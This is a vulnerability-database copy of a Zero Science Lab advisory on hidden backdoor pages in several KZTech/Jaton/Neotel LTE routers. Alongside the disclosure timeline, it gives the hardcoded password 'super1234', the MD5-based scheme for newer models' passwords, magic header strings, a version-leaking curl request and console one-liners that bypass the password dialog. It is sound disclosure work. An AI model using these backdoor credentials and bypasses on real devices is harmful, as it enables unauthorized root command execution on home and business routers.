Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2021-5639
HistoryMar 18, 2021 - 12:00 a.m.

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Remote Code Execution (Backdoors)

2021-03-1800:00:00
Gjoko Krstic
zeroscience.mk
104

8.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

JSON

Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Remote Code Execution (Backdoors)
Advisory ID: ZSL-2021-5639
Type: Local/Remote
Impact: Security Bypass, System Access, DoS
Risk: (5/5)
Release Date: 18.03.2021

Summary

JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

Description

The device has several backdoors and hidden pages that allow remote code exeuction, overwriting of the bootrom and enabling debug mode.

Vendor

KZ Broadband Technologies, Ltd. - <http://www.kzbtech.com>
Jaton Technology, Ltd. - <http://www.jatontec.com>
Neotel DOO - <https://www.neotel.mk>

Affected Version

Model | Firmware

JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01

Tested On

GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0

Vendor Status

[03.02.2021] Vulnerability discovered.
[05.02.2021] Contact with Neotel.
[07.02.2021] Contact with KZ Tech.
[08.02.2021] Contact with Jaton Tech.
[09.02.2021] Contact with Neotel.
[12.02.2021] Contact with MKD-CIRT.
[12.02.2021] MKD-CIRT opens a case, informs Neotel.
[17.03.2021] No response from the vendors.
[18.03.2021] Public security advisory released.

PoC

jt3500v_rce_bd.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/49683&gt;
[2] <https://packetstormsecurity.com/files/161885/&gt;
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/198532&gt;
[4] <https://vulners.com/cve/CVE-2021-28261&gt;
[5] <https://nvd.nist.gov/vuln/detail/CVE-2021-28261&gt;

Changelog

[18.03.2021] - Initial release
[23.03.2021] - Added reference [1], [2] and [3]
[19.06.2021] - Added reference [4] and [5]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Remote Code Execution (Backdoors)


Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version:  Model | Firmware
                  -------|---------
                 JT3500V | 2.0.1B1064
                 JT3300V | 2.0.1B1047
                 AM6200M | 2.0.0B3210
                 AM6000N | 2.0.0B3042
                 AM5000W | 2.0.0B3037
                 AM4200M | 2.0.0B2996
                 AM4100V | 2.0.0B2988
                AM3500MW | 2.0.0B1092
                 AM3410V | 2.0.0B1085
                 AM3300V | 2.0.0B1060
                 AM3100E | 2.0.0B981
                 AM3100V | 2.0.0B946
                 AM3000M | 2.0.0B21
                 KZ7621U | 2.0.0B14
                 KZ3220M | 2.0.0B04
                 KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
&amp; VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: The device has several backdoors and hidden pages that
allow remote code exeuction, overwriting of the bootrom and
enabling debug mode.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5639
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php


03.02.2021

--


Older and newer models defer in backdoor code.
By navigating to /syscmd.html or /syscmd.asp pages
an attacker can authenticate and execute system
commands with highest privileges.

Old models (syscmd.asp) password: super1234

Newer models (syscmd.html) password: md5(WAN_MAC+version):

$ curl -k https://192.168.1.1/goform/getImgVersionInfo
{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}

...
pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
  if (*pcVar6 == 0) {
    pcVar6 = "6C:AD:EF:00:00:01";
  }
  memset(acStack280,0,0x100);
  sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
  ...
  psMd5Init(auStack112);
  psMd5Update(auStack112,local_10,local_c);
  psMd5Final(auStack112,uParm1);
  return;
...


Another 2 backdoors exist using the websCheckCookie() and specific header strings.

...
      iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
      if (iVar2 != 0) {
        return 0xffffffff;
      }
      if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &amp;&amp;
         (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
        return 0xffffffff;
        ...
        if (iVar1 != 0) goto LAB_0047c304;
LAB_0047c32c:
    WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
LAB_0047c35c:
    __n = strlen(__s1);
    if (__n == 0) {
      snprintf(acStack1560,0x200,"cat /dev/null &gt; %s","/var/system_command.log");
      WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
      system(acStack1560);
      websWrite(iParm1,"invalid command!");
      goto LAB_0047c3f8;
    }
...


Bypass the backdoor password request and enable debug mode from within the web console:

$('#div_check').modal('hide');  &lt;--- syscmd.html

g_password_check_alert.close(); &lt;--- syscmd.asp
</p></body></html>

8.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

JSON